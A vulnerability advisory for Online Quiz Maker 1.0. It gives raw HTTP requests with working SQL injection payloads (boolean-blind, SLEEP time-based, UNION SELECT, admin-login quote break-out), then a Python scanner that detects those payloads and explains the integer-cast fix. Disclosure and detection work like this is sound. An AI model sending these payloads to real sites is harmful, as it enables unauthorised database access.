# Exploit Title: Online Quiz Maker 1.0 - 'catid' SQL Injection
# Dork: N/A
# Date: 2018-09-03
# Exploit Author: Özkan Mustafa Akkuş (AkkuS)
# Vendor Homepage: https://www.hscripts.com/scripts/php/quiz-maker.php
# Software Link: https://www.hscripts.com/scripts/php/downloads/quiz-maker.zip
# Version: 1.0
# Category: Webapps
# Tested on: Kali linux

# Description: An attacker can execute SQL commands through vulnerable
# parameters.
# An authorized user can use the filtering feature and can fully access
# the database or other server information. There are also XSS
# vulnerabilities.

# PoC : SQLi 1 :

# Request(POST):

POST /scripts/php/quiz-system/quiz-system.php HTTP/1.1
Host: server
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: https://www.hscripts.com/scripts/php/quiz-system/quiz-system.php
Connection: keep-alive
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 18

uname=test&catid=1

# Parameter: catid (POST)

# Type: boolean-based blind
# Title: AND boolean-based blind - WHERE or HAVING clause
# Payload: uname=test&catid=1 AND 4815=4815

# Type: AND/OR time-based blind
# Title: MySQL >= 5.0.12 AND time-based blind
# Payload: uname=test&catid=1 AND SLEEP(5)

# Type: UNION query
# Title: Generic UNION query (NULL) - 10 columns
# Payload: uname=test&catid=1 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x7170626271,0x56476b436866655067774c6d786b6e434f59566c7541666363786855764c686b5949486e6a4d6b68,0x7178716271),NULL,NULL,NULL--bocR

# PoC : SQLi 2 : Admin Login SQL Injection

# Request(POST):

POST /scripts/php/quiz-system/admin/add-category.php HTTP/1.1
Host: server
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: https://server/admin/add-category.php
Cookie: PHPSESSID=k001uia98prmln85spaid6pvq4
Connection: keep-alive
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 38

usern=testing&passw=password&type=auth

# Parameter: usern (POST)

# Type: AND/OR time-based blind
# Title: MySQL >= 5.0.12 AND time-based blind
# Payload: usern=testing' AND SLEEP(5) AND 'ZECL'='ZECL&passw=password&type=auth
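The three injection types listed above (boolean-based, time-based, UNION) and the quote break-out in the admin login each leave a recognisable shape in the POST body. As an added defender-side example that is not part of this advisory or of the Online Quiz Maker code, the following Python scanner parses request bodies the way the application would and flags those shapes. The sample bodies are constructed from the payloads quoted above (the long CONCAT hex string is shortened); the signature list and the expectation that `catid` is strictly numeric are assumptions made for the example.

```python
import re
from urllib.parse import parse_qs

# Constructed sample bodies: the benign baseline request from the advisory,
# its three catid payloads, and the usern payload from the admin login PoC.
SAMPLE_BODIES = [
    "uname=test&catid=1",
    "uname=test&catid=1 AND 4815=4815",
    "uname=test&catid=1 AND SLEEP(5)",
    "uname=test&catid=1 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,"
    "CONCAT(0x7170626271,0x5647,0x7178716271),NULL,NULL,NULL--bocR",
    "usern=testing' AND SLEEP(5) AND 'ZECL'='ZECL&passw=password&type=auth",
]

# Assumed signature set, one entry per injection type named in the advisory.
SQLI_SIGNATURES = [
    # "AND 4815=4815": a tautology whose two sides are the same integer.
    ("boolean-based blind", re.compile(r"\b(and|or)\s+(\d+)\s*=\s*\2\b", re.I)),
    # "AND SLEEP(5)": a delay function call in a value.
    ("time-based blind", re.compile(r"\b(sleep|benchmark)\s*\(", re.I)),
    # "UNION ALL SELECT NULL,...": a union-appended select.
    ("UNION query", re.compile(r"\bunion\b(\s+all)?\s+select\b", re.I)),
    # "testing' AND ...": closing a string literal and continuing the clause.
    ("string context break-out", re.compile(r"'\s*(and|or)\b", re.I)),
]

# Assumption: catid is a category id and must be a plain integer. Checking
# the expected type is the strongest signal and needs no payload knowledge.
NUMERIC_PARAMS = {"catid"}


def scan_body(body):
    """Return a list of (parameter, finding) pairs for one URL-encoded body."""
    findings = []
    # parse_qs splits each pair on the first '=' only, so the '=' inside
    # "'ZECL'='ZECL" stays in the value just as PHP's $_POST would keep it.
    for name, values in parse_qs(body, keep_blank_values=True).items():
        for value in values:
            if name in NUMERIC_PARAMS and not re.fullmatch(r"\d+", value):
                findings.append((name, "non-numeric value in numeric parameter"))
            for label, pattern in SQLI_SIGNATURES:
                if pattern.search(value):
                    findings.append((name, label))
    return findings


def scan_log(bodies):
    """Map each body to its findings; bodies with an empty list are clean."""
    return {body: scan_body(body) for body in bodies}


if __name__ == "__main__":
    for body, findings in scan_log(SAMPLE_BODIES).items():
        print(body)
        for name, label in findings or [("-", "no findings")]:
            print(f"    {name}: {label}")
```

The type check on `catid` fires for all three of the advisory's payloads before any signature is consulted, which is the same reason a server-side fix of casting the parameter to an integer (or binding it as an integer in a prepared statement) closes the first PoC; the signature patterns are what remain useful for string parameters such as `usern`, where a type check cannot apply.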